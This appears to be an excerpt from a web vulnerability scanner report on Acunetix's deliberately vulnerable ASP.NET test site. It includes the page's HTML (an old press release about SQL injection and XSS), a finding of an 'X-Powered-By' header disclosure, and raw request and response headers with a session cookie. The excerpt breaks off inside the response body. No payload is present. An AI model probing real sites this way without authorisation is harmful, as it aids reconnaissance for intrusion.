ZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 17979
Response Body - size: 17,979 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 